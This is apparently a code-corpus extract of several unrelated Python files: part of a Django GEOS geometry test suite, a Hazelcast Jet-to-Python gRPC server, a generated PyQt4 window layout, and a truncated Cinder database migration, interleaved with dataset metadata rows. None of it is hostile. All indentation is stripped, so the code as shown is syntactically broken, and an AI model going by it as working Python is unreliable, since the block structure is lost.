"Testing LinearRing objects."
for rr in linearrings:
lr = fromstr(rr.wkt)
self.assertEqual(lr.geom_type, 'LinearRing')
self.assertEqual(lr.geom_typeid, 2)
self.assertEqual(rr.n_p, len(lr))
self.assertEqual(True, lr.valid)
self.assertEqual(False, lr.empty)
# Creating a LinearRing from a tuple, list, and numpy array
self.assertEqual(lr, LinearRing(lr.tuple))
self.assertEqual(lr, LinearRing(*lr.tuple))
self.assertEqual(lr, LinearRing([list(tup) for tup in lr.tuple]))
if HAS_NUMPY: self.assertEqual(lr, LinearRing(array(lr.tuple)))
def test05a_polygons(self):
"Testing Polygon objects."
prev = fromstr('POINT(0 0)')
for p in polygons:
# Creating the Polygon, testing its properties.
poly = fromstr(p.wkt)
self.assertEqual(poly.geom_type, 'Polygon')
self.assertEqual(poly.geom_typeid, 3)
self.assertEqual(poly.empty, False)
self.assertEqual(poly.ring, False)
self.assertEqual(p.n_i, poly.num_interior_rings)
self.assertEqual(p.n_i + 1, len(poly)) # Testing __len__
self.assertEqual(p.n_p, poly.num_points)
# Area & Centroid
self.assertAlmostEqual(p.area, poly.area, 9)
self.assertAlmostEqual(p.centroid[0], poly.centroid.tuple[0], 9)
self.assertAlmostEqual(p.centroid[1], poly.centroid.tuple[1], 9)
# Testing the geometry equivalence
self.assertEqual(True, poly == fromstr(p.wkt))
self.assertEqual(False, poly == prev) # Should not be equal to previous geometry
self.assertEqual(True, poly != prev)
# Testing the exterior ring
ring = poly.exterior_ring
self.assertEqual(ring.geom_type, 'LinearRing')
self.assertEqual(ring.geom_typeid, 2)
if p.ext_ring_cs:
self.assertEqual(p.ext_ring_cs, ring.tuple)
self.assertEqual(p.ext_ring_cs, poly[0].tuple) # Testing __getitem__
# Testing __getitem__ and __setitem__ on invalid indices
self.assertRaises(GEOSIndexError, poly.__getitem__, len(poly))
self.assertRaises(GEOSIndexError, poly.__setitem__, len(poly), False)
self.assertRaises(GEOSIndexError, poly.__getitem__, -1)
# Testing __iter__
for r in poly:
self.assertEqual(r.geom_type, 'LinearRing')
self.assertEqual(r.geom_typeid, 2)
# Testing polygon construction.
self.assertRaises(TypeError, Polygon.__init__, 0, [1, 2, 3])
self.assertRaises(TypeError, Polygon.__init__, 'foo')
# Polygon(shell, (hole1, ... holeN))
rings = tuple(r for r in poly)
self.assertEqual(poly, Polygon(rings[0], rings[1:]))
# Polygon(shell_tuple, hole_tuple1, ... , hole_tupleN)
ring_tuples = tuple(r.tuple for r in poly)
self.assertEqual(poly, Polygon(*ring_tuples))
# Constructing with tuples of LinearRings.
self.assertEqual(poly.wkt, Polygon(*tuple(r for r in poly)).wkt)
self.assertEqual(poly.wkt, Polygon(*tuple(LinearRing(r.tuple) for r in poly)).wkt)
def test05b_multipolygons(self):
"Testing MultiPolygon objects."
print "\nBEGIN - expecting GEOS_NOTICE; safe to ignore.\n"
prev = fromstr('POINT (0 0)')
for mp in multipolygons:
mpoly = fromstr(mp.wkt)
self.assertEqual(mpoly.geom_type, 'MultiPolygon')
self.assertEqual(mpoly.geom_typeid, 6)
self.assertEqual(mp.valid, mpoly.valid)
if mp.valid:
self.assertEqual(mp.num_geom, mpoly.num_geom)
self.assertEqual(mp.n_p, mpoly.num_coords)
self.assertEqual(mp.num_geom, len(mpoly))
self.assertRaises(GEOSIndexError, mpoly.__getitem__, len(mpoly))
for p in mpoly:
self.assertEqual(p.geom_type, 'Polygon')
self.assertEqual(p.geom_typeid, 3)
self.assertEqual(p.valid, True)
self.assertEqual(mpoly.wkt, MultiPolygon(*tuple(poly.clone() for poly in mpoly)).wkt)
print "\nEND - expecting GEOS_NOTICE; safe to ignore.\n"
def test06a_memory_hijinks(self):
"Testing Geometry __del__() on rings and polygons."
#### Memory issues with rings and polygons
# These tests are needed to ensure sanity with writable geometries.
# Getting a polygon with interior rings, and pulling out the interior rings
poly = fromstr(polygons[1].wkt)
ring1 = poly[0]
ring2 = poly[1]
# These deletes should be 'harmless' since they are done on child geometries
del ring1
del ring2
ring1 = poly[0]
ring2 = poly[1]
# Deleting the polygon
del poly
# Access to these rings is OK since they are clones.
s1, s2 = str(ring1), str(ring2)
# The previous hijinks tests are now moot because only clones are
# now used =)
def test08_coord_seq(self):
"Testing Coordinate Sequence objects."
for p in polygons:
if p.ext_ring_cs:
# Constructing the polygon and getting the coordinate sequence
poly = fromstr(p.wkt)
cs = poly.exterior_ring.coord_seq
self.assertEqual(p.ext_ring_cs, cs.tuple) # done in the Polygon test too.
self.assertEqual(len(p.ext_ring_cs), len(cs)) # Making sure __len__ works
# Checks __getitem__ and __setitem__
for i in xrange(len(p.ext_ring_cs)):
c1 = p.ext_ring_cs[i] # Expected value
c2 = cs[i] # Value from coordseq
self.assertEqual(c1, c2)
# Constructing the test value to set the coordinate sequence with
if len(c1) == 2: tset = (5, 23)
else: tset = (5, 23, 8)
cs[i] = tset
# Making sure every set point matches what we expect
for j in range(len(tset)):
cs[i] = tset
self.assertEqual(tset[j], cs[i][j])
def test09_relate_pattern(self):
"Testing relate() and relate_pattern()."
g = fromstr('POINT (0 0)')
self.assertRaises(GEOSException, g.relate_pattern, 0, 'invalid pattern, yo')
for i in xrange(len(relate_geoms)):
g_tup = relate_geoms[i]
a = fromstr(g_tup[0].wkt)
b = fromstr(g_tup[1].wkt)
pat = g_tup[2]
result = g_tup[3]
self.assertEqual(result, a.relate_pattern(b, pat))
self.assertEqual(pat, a.relate(b))
def test10_intersection(self):
"Testing intersects() and intersection()."
for i in xrange(len(topology_geoms)):
g_tup = topology_geoms[i]
a = fromstr(g_tup[0].wkt)
b = fromstr(g_tup[1].wkt)
i1 = fromstr(intersect_geoms[i].wkt)
self.assertEqual(True, a.intersects(b))
i2 = a.intersection(b)
self.assertEqual(i1, i2)
self.assertEqual(i1, a & b) # __and__ is intersection operator
a &= b # testing __iand__
self.assertEqual(i1, a)
def test11_union(self):
"Testing union()."
for i in xrange(len(topology_geoms)):
g_tup = topology_geoms[i]
a = fromstr(g_tup[0].wkt)
b = fromstr(g_tup[1].wkt)
u1 = fromstr(union_geoms[i].wkt)
u2 = a.union(b)
self.assertEqual(u1, u2)
self.assertEqual(u1, a | b) # __or__ is union operator
a |= b # testing __ior__
self.assertEqual(u1, a)
def test12_difference(self):
"Testing difference()."
for i in xrange(len(topology_geoms)):
g_tup = topology_geoms[i]
a = fromstr(g_tup[0].wkt)
b = fromstr(g_tup[1].wkt)
d1 = fromstr(diff_geoms[i].wkt)
d2 = a.difference(b)
self.assertEqual(d1, d2)
self.assertEqual(d1, a - b) # __sub__ is difference operator
a -= b # testing __isub__
self.assertEqual(d1, a)
def test13_symdifference(self):
"Testing sym_difference()."
for i in xrange(len(topology_geoms)):
g_tup = topology_geoms[i]
a = fromstr(g_tup[0].wkt)
b = fromstr(g_tup[1].wkt)
d1 = fromstr(sdiff_geoms[i].wkt)
d2 = a.sym_difference(b)
self.assertEqual(d1, d2)
self.assertEqual(d1, a ^ b) # __xor__ is symmetric difference operator
a ^= b # testing __ixor__
self.assertEqual(d1, a)
def test14_buffer(self):
"Testing buffer()."
for i in xrange(len(buffer_geoms)):
g_tup = buffer_geoms[i]
g = fromstr(g_tup[0].wkt)
# The buffer we expect
exp_buf = fromstr(g_tup[1].wkt)
# Can't use a floating-point for the number of quadsegs.
self.assertRaises(ArgumentError, g.buffer, g_tup[2], float(g_tup[3]))
# Constructing our buffer
buf = g.buffer(g_tup[2], g_tup[3])
self.assertEqual(exp_buf.num_coords, buf.num_coords)
self.assertEqual(len(exp_buf), len(buf))
# Now assuring that each point in the buffer is almost equal
for j in xrange(len(exp_buf)):
exp_ring = exp_buf[j]
buf_ring = buf[j]
self.assertEqual(len(exp_ring), len(buf_ring))
for k in xrange(len(exp_ring)):
# Asserting the X, Y of each point are almost equal (due to floating point imprecision)
self.assertAlmostEqual(exp_ring[k][0], buf_ring[k][0], 9)
self.assertAlmostEqual(exp_ring[k][1], buf_ring[k][1], 9)
def test15_srid(self):
"Testing the SRID property and keyword."
# Testing SRID keyword on Point
pnt = Point(5, 23, srid=4326)
self.assertEqual(4326, pnt.srid)
pnt.srid = 3084
self.assertEqual(3084, pnt.srid)
self.assertRaises(ArgumentError, pnt.set_srid, '4326')
# Testing SRID keyword on fromstr(), and on Polygon rings.
poly = fromstr(polygons[1].wkt, srid=4269)
self.assertEqual(4269, poly.srid)
for ring in poly: self.assertEqual(4269, ring.srid)
poly.srid = 4326
self.assertEqual(4326, poly.shell.srid)
# Testing SRID keyword on GeometryCollection
gc = GeometryCollection(Point(5, 23), LineString((0, 0), (1.5, 1.5), (3, 3)), srid=32021)
self.assertEqual(32021, gc.srid)
for i in range(len(gc)): self.assertEqual(32021, gc[i].srid)
# GEOS may get the SRID from HEXEWKB
# 'POINT(5 23)' at SRID=4326 in hex form -- obtained from PostGIS
# using `SELECT GeomFromText('POINT (5 23)', 4326);`.
hex = '0101000020E610000000000000000014400000000000003740'
p1 = fromstr(hex)
self.assertEqual(4326, p1.srid)
# In GEOS 3.0.0rc1-4 when the EWKB and/or HEXEWKB is exported,
# the SRID information is lost and set to -1 -- this is not a
# problem on the 3.0.0 version (another reason to upgrade).
exp_srid = self.null_srid
p2 = fromstr(p1.hex)
self.assertEqual(exp_srid, p2.srid)
p3 = fromstr(p1.hex, srid=-1) # -1 is intended.
self.assertEqual(-1, p3.srid)
def test16_mutable_geometries(self):
"Testing the mutability of Polygons and Geometry Collections."
### Testing the mutability of Polygons ###
for p in polygons:
poly = fromstr(p.wkt)
# Should only be able to use __setitem__ with LinearRing geometries.
self.assertRaises(TypeError, poly.__setitem__, 0, LineString((1, 1), (2, 2)))
# Constructing the new shell by adding 500 to every point in the old shell.
shell_tup = poly.shell.tuple
new_coords = []
for point in shell_tup: new_coords.append((point[0] + 500., point[1] + 500.))
new_shell = LinearRing(*tuple(new_coords))
# Assigning polygon's exterior ring w/the new shell
poly.exterior_ring = new_shell
s = str(new_shell) # new shell is still accessible
self.assertEqual(poly.exterior_ring, new_shell)
self.assertEqual(poly[0], new_shell)
### Testing the mutability of Geometry Collections
for tg in multipoints:
mp = fromstr(tg.wkt)
for i in range(len(mp)):
# Creating a random point.
pnt = mp[i]
new = Point(random.randint(1, 100), random.randint(1, 100))
# Testing the assignment
mp[i] = new
s = str(new) # what was used for the assignment is still accessible
self.assertEqual(mp[i], new)
self.assertEqual(mp[i].wkt, new.wkt)
self.assertNotEqual(pnt, mp[i])
# MultiPolygons involve much more memory management because each
# Polygon w/in the collection has its own rings.
for tg in multipolygons:
mpoly = fromstr(tg.wkt)
for i in xrange(len(mpoly)):
poly = mpoly[i]
old_poly = mpoly[i]
# Offsetting the each ring in the polygon by 500.
for j in xrange(len(poly)):
r = poly[j]
for k in xrange(len(r)): r[k] = (r[k][0] + 500., r[k][1] + 500.)
poly[j] = r
self.assertNotEqual(mpoly[i], poly)
# Testing the assignment
mpoly[i] = poly
s = str(poly) # Still accessible
self.assertEqual(mpoly[i], poly)
self.assertNotEqual(mpoly[i], old_poly)
# Extreme (!!) __setitem__ -- no longer works, have to detect
# in the first object that __setitem__ is called in the subsequent
# objects -- maybe mpoly[0, 0, 0] = (3.14, 2.71)?
#mpoly[0][0][0] = (3.14, 2.71)
#self.assertEqual((3.14, 2.71), mpoly[0][0][0])
# Doing it more slowly..
#self.assertEqual((3.14, 2.71), mpoly[0].shell[0])
#del mpoly
def test17_threed(self):
"Testing three-dimensional geometries."
# Testing a 3D Point
pnt = Point(2, 3, 8)
self.assertEqual((2.,3.,8.), pnt.coords)
self.assertRaises(TypeError, pnt.set_coords, (1.,2.))
pnt.coords = (1.,2.,3.)
self.assertEqual((1.,2.,3.), pnt.coords)
# Testing a 3D LineString
ls = LineString((2., 3., 8.), (50., 250., -117.))
self.assertEqual(((2.,3.,8.), (50.,250.,-117.)), ls.tuple)
self.assertRaises(TypeError, ls.__setitem__, 0, (1.,2.))
ls[0] = (1.,2.,3.)
self.assertEqual((1.,2.,3.), ls[0])
def test18_distance(self):
"Testing the distance() function."
# Distance to self should be 0.
pnt = Point(0, 0)
self.assertEqual(0.0, pnt.distance(Point(0, 0)))
# Distance should be 1
self.assertEqual(1.0, pnt.distance(Point(0, 1)))
# Distance should be ~ sqrt(2)
self.assertAlmostEqual(1.41421356237, pnt.distance(Point(1, 1)), 11)
# Distances are from the closest vertex in each geometry --
# should be 3 (distance from (2, 2) to (5, 2)).
ls1 = LineString((0, 0), (1, 1), (2, 2))
ls2 = LineString((5, 2), (6, 1), (7, 0))
self.assertEqual(3, ls1.distance(ls2))
def test19_length(self):
"Testing the length property."
# Points have 0 length.
pnt = Point(0, 0)
self.assertEqual(0.0, pnt.length)
# Should be ~ sqrt(2)
ls = LineString((0, 0), (1, 1))
self.assertAlmostEqual(1.41421356237, ls.length, 11)
# Should be circumfrence of Polygon
poly = Polygon(LinearRing((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
self.assertEqual(4.0, poly.length)
# Should be sum of each element's length in collection.
mpoly = MultiPolygon(poly.clone(), poly)
self.assertEqual(8.0, mpoly.length)
def test20_emptyCollections(self):
"Testing empty geometries and collections."
gc1 = GeometryCollection([])
gc2 = fromstr('GEOMETRYCOLLECTION EMPTY')
pnt = fromstr('POINT EMPTY')
ls = fromstr('LINESTRING EMPTY')
poly = fromstr('POLYGON EMPTY')
mls = fromstr('MULTILINESTRING EMPTY')
mpoly1 = fromstr('MULTIPOLYGON EMPTY')
mpoly2 = MultiPolygon(())
for g in [gc1, gc2, pnt, ls, poly, mls, mpoly1, mpoly2]:
self.assertEqual(True, g.empty)
# Testing len() and num_geom.
if isinstance(g, Polygon):
self.assertEqual(1, len(g)) # Has one empty linear ring
self.assertEqual(1, g.num_geom)
self.assertEqual(0, len(g[0]))
elif isinstance(g, (Point, LineString)):
self.assertEqual(1, g.num_geom)
self.assertEqual(0, len(g))
else:
self.assertEqual(0, g.num_geom)
self.assertEqual(0, len(g))
# Testing __getitem__ (doesn't work on Point or Polygon)
if isinstance(g, Point):
self.assertRaises(GEOSIndexError, g.get_x)
elif isinstance(g, Polygon):
lr = g.shell
self.assertEqual('LINEARRING EMPTY', lr.wkt)
self.assertEqual(0, len(lr))
self.assertEqual(True, lr.empty)
self.assertRaises(GEOSIndexError, lr.__getitem__, 0)
else:
self.assertRaises(GEOSIndexError, g.__getitem__, 0)
def test21_test_gdal(self):
"Testing `ogr` and `srs` properties."
if not HAS_GDAL: return
g1 = fromstr('POINT(5 23)')
self.assertEqual(True, isinstance(g1.ogr, OGRGeometry))
self.assertEqual(g1.srs, None)
g2 = fromstr('LINESTRING(0 0, 5 5, 23 23)', srid=4326)
self.assertEqual(True, isinstance(g2.ogr, OGRGeometry))
self.assertEqual(True, isinstance(g2.srs, SpatialReference))
self.assertEqual(g2.hex, g2.ogr.hex)
self.assertEqual('WGS 84', g2.srs.name)
def test22_copy(self):
"Testing use with the Python `copy` module."
import copy
poly = GEOSGeometry('POLYGON((0 0, 0 23, 23 23, 23 0, 0 0), (5 5, 5 10, 10 10, 10 5, 5 5))')
cpy1 = copy.copy(poly)
cpy2 = copy.deepcopy(poly)
self.assertNotEqual(poly._ptr, cpy1._ptr)
self.assertNotEqual(poly._ptr, cpy2._ptr)
def test23_transform(self):
"Testing `transform` method."
if not HAS_GDAL: return
orig = GEOSGeometry('POINT (-104.609 38.255)', 4326)
trans = GEOSGeometry('POINT (992385.4472045 481455.4944650)', 2774)
# Using a srid, a SpatialReference object, and a CoordTransform object
# for transformations.
t1, t2, t3 = orig.clone(), orig.clone(), orig.clone()
t1.transform(trans.srid)
t2.transform(SpatialReference('EPSG:2774'))
ct = CoordTransform(SpatialReference('WGS84'), SpatialReference(2774))
t3.transform(ct)
# Testing use of the `clone` keyword.
k1 = orig.clone()
k2 = k1.transform(trans.srid, clone=True)
self.assertEqual(k1, orig)
self.assertNotEqual(k1, k2)
prec = 3
for p in (t1, t2, t3, k2):
self.assertAlmostEqual(trans.x, p.x, prec)
self.assertAlmostEqual(trans.y, p.y, prec)
def test24_extent(self):
"Testing `extent` method."
# The xmin, ymin, xmax, ymax of the MultiPoint should be returned.
mp = MultiPoint(Point(5, 23), Point(0, 0), Point(10, 50))
self.assertEqual((0.0, 0.0, 10.0, 50.0), mp.extent)
pnt = Point(5.23, 17.8)
# Extent of points is just the point itself repeated.
self.assertEqual((5.23, 17.8, 5.23, 17.8), pnt.extent)
# Testing on the 'real world' Polygon.
poly = fromstr(polygons[3].wkt)
ring = poly.shell
x, y = ring.x, ring.y
xmin, ymin = min(x), min(y)
xmax, ymax = max(x), max(y)
self.assertEqual((xmin, ymin, xmax, ymax), poly.extent)
def test25_pickle(self):
"Testing pickling and unpickling support."
# Using both pickle and cPickle -- just 'cause.
import pickle, cPickle
# Creating a list of test geometries for pickling,
# and setting the SRID on some of them.
def get_geoms(lst, srid=None):
return [GEOSGeometry(tg.wkt, srid) for tg in lst]
tgeoms = get_geoms(points)
tgeoms.extend(get_geoms(multilinestrings, 4326))
tgeoms.extend(get_geoms(polygons, 3084))
tgeoms.extend(get_geoms(multipolygons, 900913))
# The SRID won't be exported in GEOS 3.0 release candidates.
no_srid = self.null_srid == -1
for geom in tgeoms:
s1, s2 = cPickle.dumps(geom), pickle.dumps(geom)
g1, g2 = cPickle.loads(s1), pickle.loads(s2)
for tmpg in (g1, g2):
self.assertEqual(geom, tmpg)
if not no_srid: self.assertEqual(geom.srid, tmpg.srid)
def suite():
s = unittest.TestSuite()
s.addTest(unittest.makeSuite(GEOSTest))
return s
def run(verbosity=2):
unittest.TextTestRunner(verbosity=verbosity).run(suite())
| apache-2.0 | 493,359,934,862,514,500 | 39.643871 | 121 | 0.561224 | false |
hazelcast/hazelcast | extensions/python/src/main/resources/jet_to_python_grpc_server.py | 10 | 3200 | import grpc
import sys
import os
import socket
import logging
import importlib
from concurrent import futures
import jet_to_python_pb2
import jet_to_python_pb2_grpc
logger = logging.getLogger('Python PID %d' % os.getpid())
class JetToPythonServicer(jet_to_python_pb2_grpc.JetToPythonServicer):
def __init__(self, handler_function):
self._handler_function = handler_function
def streamingCall(self, request_iterator, context):
for request in request_iterator:
output_list = self._handler_function(request.inputValue)
output_item = jet_to_python_pb2.OutputMessage(outputValue = output_list)
yield output_item
logger.info('gRPC call completed')
def load_handler_function(handler_module_name, handler_function_name):
try:
handler_module = importlib.import_module(handler_module_name)
except ImportError as e:
raise RuntimeError("Cannot import module %s" % (handler_module_name), e)
if not hasattr(handler_module, handler_function_name):
raise RuntimeError("Handler function %s.%s doesn't exist" % (handler_module_name, handler_function_name))
return getattr(handler_module, handler_function_name)
def serve(phoneback_port, handler_module_name, handler_function_name):
# Fail as soon as possible for any simple problem with passed-in arguments
phoneback_port_int = int(phoneback_port)
handler_function = load_handler_function(handler_module_name, handler_function_name)
server = grpc.server(futures.ThreadPoolExecutor(max_workers=1), options=[
('grpc.max_send_message_length', 100 * 1024 * 1024),
('grpc.max_receive_message_length', 100 * 1024 * 1024),
('grpc.so_reuseport', 0)
])
jet_to_python_pb2_grpc.add_JetToPythonServicer_to_server(
JetToPythonServicer(handler_function),
server
)
listen_port = server.add_insecure_port('localhost:0')
if listen_port == 0:
logger.error("Couldn't find a port to bind to")
return
phoneback_message = ('%d\n' % listen_port).encode('utf-8')
server.start()
logger.info('started listening on port %d', listen_port)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect(('localhost', phoneback_port_int))
s.sendall(phoneback_message)
# Wait for a stop signal in stdin
stdin_message = input()
if stdin_message == 'stop':
logger.info('Received a "stop" message from stdin. Stopping the server.')
else:
logger.info('Received an unexpected message from stdin: "%s"' % stdin_message)
server.stop(0).wait()
if __name__ == '__main__':
logging.basicConfig(stream=sys.stdout, format='%(asctime)s %(levelname)s [%(name)s] %(threadName)s - %(message)s', level=logging.INFO)
# Expecting these command-line parameters:
# - $1 is the port where Jet is listening for the Python process to
# 'phone back' and tell Jet on which port it started its gRPC endpoint.
# - $2.$3 is the module.function of the handler function that will handle
# the input from Jet.
serve(phoneback_port=sys.argv[1], handler_module_name=sys.argv[2], handler_function_name=sys.argv[3])
| apache-2.0 | 4,658,484,364,949,678,000 | 40.558442 | 138 | 0.68875 | false |
creasyw/IMTAphy | modules/phy/imtaphy/testConfigs/imtaphyViewer/ui/Windows_Main_ui.py | 1 | 9101 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'Windows_Main.ui'
#
# Created: Tue Jan 24 03:15:16 2012
# by: PyQt4 UI code generator 4.8.5
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_Windows_Main(object):
def setupUi(self, Windows_Main):
Windows_Main.setObjectName(_fromUtf8("Windows_Main"))
Windows_Main.resize(752, 550)
Windows_Main.setWindowTitle(QtGui.QApplication.translate("Windows_Main", "IMTAphyViewer 0.1", None, QtGui.QApplication.UnicodeUTF8))
self.centralwidget = QtGui.QWidget(Windows_Main)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.vboxlayout = QtGui.QVBoxLayout(self.centralwidget)
self.vboxlayout.setSpacing(6)
self.vboxlayout.setMargin(9)
self.vboxlayout.setObjectName(_fromUtf8("vboxlayout"))
Windows_Main.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(Windows_Main)
self.menubar.setGeometry(QtCore.QRect(0, 0, 752, 25))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setTitle(QtGui.QApplication.translate("Windows_Main", "&File", None, QtGui.QApplication.UnicodeUTF8))
self.menuFile.setObjectName(_fromUtf8("menuFile"))
Windows_Main.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(Windows_Main)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.statusbar.sizePolicy().hasHeightForWidth())
self.statusbar.setSizePolicy(sizePolicy)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
Windows_Main.setStatusBar(self.statusbar)
self.actionQuit = QtGui.QAction(Windows_Main)
self.actionQuit.setText(QtGui.QApplication.translate("Windows_Main", "&Quit", None, QtGui.QApplication.UnicodeUTF8))
self.actionQuit.setShortcut(QtGui.QApplication.translate("Windows_Main", "Ctrl+Q", None, QtGui.QApplication.UnicodeUTF8))
self.actionQuit.setObjectName(_fromUtf8("actionQuit"))
self.actionAboutQt = QtGui.QAction(Windows_Main)
self.actionAboutQt.setText(QtGui.QApplication.translate("Windows_Main", "About Qt", None, QtGui.QApplication.UnicodeUTF8))
self.actionAboutQt.setObjectName(_fromUtf8("actionAboutQt"))
self.actionAboutWrowser = QtGui.QAction(Windows_Main)
self.actionAboutWrowser.setText(QtGui.QApplication.translate("Windows_Main", "About Wrowser", None, QtGui.QApplication.UnicodeUTF8))
self.actionAboutWrowser.setObjectName(_fromUtf8("actionAboutWrowser"))
self.actionOpenDatabase = QtGui.QAction(Windows_Main)
self.actionOpenDatabase.setText(QtGui.QApplication.translate("Windows_Main", "Open S&QLObject Database", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpenDatabase.setObjectName(_fromUtf8("actionOpenDatabase"))
self.actionOpenDSV = QtGui.QAction(Windows_Main)
self.actionOpenDSV.setText(QtGui.QApplication.translate("Windows_Main", "Open DS&V", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpenDSV.setIconText(QtGui.QApplication.translate("Windows_Main", "Open DSV", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpenDSV.setObjectName(_fromUtf8("actionOpenDSV"))
self.actionOpenPythonCampaign = QtGui.QAction(Windows_Main)
self.actionOpenPythonCampaign.setText(QtGui.QApplication.translate("Windows_Main", "Open &Python Campaign", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpenPythonCampaign.setObjectName(_fromUtf8("actionOpenPythonCampaign"))
self.actionOpenDirectory = QtGui.QAction(Windows_Main)
self.actionOpenDirectory.setText(QtGui.QApplication.translate("Windows_Main", "Open &Directory", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpenDirectory.setObjectName(_fromUtf8("actionOpenDirectory"))
self.actionCloseFigure = QtGui.QAction(Windows_Main)
self.actionCloseFigure.setText(QtGui.QApplication.translate("Windows_Main", "&Close", None, QtGui.QApplication.UnicodeUTF8))
self.actionCloseFigure.setObjectName(_fromUtf8("actionCloseFigure"))
self.actionCloseDataSource = QtGui.QAction(Windows_Main)
self.actionCloseDataSource.setEnabled(False)
self.actionCloseDataSource.setText(QtGui.QApplication.translate("Windows_Main", "&Close", None, QtGui.QApplication.UnicodeUTF8))
self.actionCloseDataSource.setObjectName(_fromUtf8("actionCloseDataSource"))
self.actionNewLogEval = QtGui.QAction(Windows_Main)
self.actionNewLogEval.setText(QtGui.QApplication.translate("Windows_Main", "LogEval", None, QtGui.QApplication.UnicodeUTF8))
self.actionNewLogEval.setObjectName(_fromUtf8("actionNewLogEval"))
self.actionNewTimeSeries = QtGui.QAction(Windows_Main)
self.actionNewTimeSeries.setText(QtGui.QApplication.translate("Windows_Main", "TimeSeries", None, QtGui.QApplication.UnicodeUTF8))
self.actionNewTimeSeries.setObjectName(_fromUtf8("actionNewTimeSeries"))
self.actionNewLRE = QtGui.QAction(Windows_Main)
self.actionNewLRE.setText(QtGui.QApplication.translate("Windows_Main", "(D)LRE", None, QtGui.QApplication.UnicodeUTF8))
self.actionNewLRE.setObjectName(_fromUtf8("actionNewLRE"))
self.actionNewBatchMeans = QtGui.QAction(Windows_Main)
self.actionNewBatchMeans.setText(QtGui.QApplication.translate("Windows_Main", "BatchMeans", None, QtGui.QApplication.UnicodeUTF8))
self.actionNewBatchMeans.setObjectName(_fromUtf8("actionNewBatchMeans"))
self.actionNewTable = QtGui.QAction(Windows_Main)
self.actionNewTable.setText(QtGui.QApplication.translate("Windows_Main", "Table", None, QtGui.QApplication.UnicodeUTF8))
self.actionNewTable.setObjectName(_fromUtf8("actionNewTable"))
self.actionNewXDF = QtGui.QAction(Windows_Main)
self.actionNewXDF.setText(QtGui.QApplication.translate("Windows_Main", "PDF/CDF/CCDF", None, QtGui.QApplication.UnicodeUTF8))
self.actionNewXDF.setObjectName(_fromUtf8("actionNewXDF"))
self.actionNewParameter = QtGui.QAction(Windows_Main)
self.actionNewParameter.setText(QtGui.QApplication.translate("Windows_Main", "Parameter", None, QtGui.QApplication.UnicodeUTF8))
self.actionNewParameter.setObjectName(_fromUtf8("actionNewParameter"))
self.actionConfigure = QtGui.QAction(Windows_Main)
self.actionConfigure.setText(QtGui.QApplication.translate("Windows_Main", "C&onfigure...", None, QtGui.QApplication.UnicodeUTF8))
self.actionConfigure.setObjectName(_fromUtf8("actionConfigure"))
self.actionOpenCampaignDatabase = QtGui.QAction(Windows_Main)
self.actionOpenCampaignDatabase.setText(QtGui.QApplication.translate("Windows_Main", "Open &Campaign Database", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpenCampaignDatabase.setObjectName(_fromUtf8("actionOpenCampaignDatabase"))
self.actionRefresh = QtGui.QAction(Windows_Main)
self.actionRefresh.setText(QtGui.QApplication.translate("Windows_Main", "&Refresh", None, QtGui.QApplication.UnicodeUTF8))
self.actionRefresh.setObjectName(_fromUtf8("actionRefresh"))
self.actionView_Scenario = QtGui.QAction(Windows_Main)
self.actionView_Scenario.setText(QtGui.QApplication.translate("Windows_Main", "View &Scenario", None, QtGui.QApplication.UnicodeUTF8))
self.actionView_Scenario.setObjectName(_fromUtf8("actionView_Scenario"))
self.actionPreferences = QtGui.QAction(Windows_Main)
self.actionPreferences.setText(QtGui.QApplication.translate("Windows_Main", "Preferences", None, QtGui.QApplication.UnicodeUTF8))
self.actionPreferences.setObjectName(_fromUtf8("actionPreferences"))
self.actionView_CouchDB_Trace = QtGui.QAction(Windows_Main)
self.actionView_CouchDB_Trace.setText(QtGui.QApplication.translate("Windows_Main", "View CouchDB Trace", None, QtGui.QApplication.UnicodeUTF8))
self.actionView_CouchDB_Trace.setObjectName(_fromUtf8("actionView_CouchDB_Trace"))
self.menuFile.addAction(self.actionCloseDataSource)
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionView_Scenario)
self.menuFile.addAction(self.actionView_CouchDB_Trace)
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionRefresh)
self.menuFile.addAction(self.actionQuit)
self.menubar.addAction(self.menuFile.menuAction())
self.retranslateUi(Windows_Main)
QtCore.QObject.connect(self.actionQuit, QtCore.SIGNAL(_fromUtf8("activated()")), Windows_Main.close)
QtCore.QMetaObject.connectSlotsByName(Windows_Main)
def retranslateUi(self, Windows_Main):
pass
import viewer_rc
| gpl-2.0 | -7,998,344,511,708,677,000 | 69.550388 | 158 | 0.745413 | false |
tlakshman26/cinder-https-changes | cinder/db/sqlalchemy/migrate_repo/versions/037_add_cgsnapshot_id_column_to_consistencygroups.py | 20 | 1371 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import Column
from sqlalchemy import MetaData, String, Table
def upgrade(migrate_engine):
"""Add cgsnapshot_id column to consistencygroups."""
meta = MetaData()
meta.bind = migrate_engine
consistencygroups = Table('consistencygroups', meta, autoload=True)
cgsnapshot_id = Column('cgsnapshot_id', String(36))
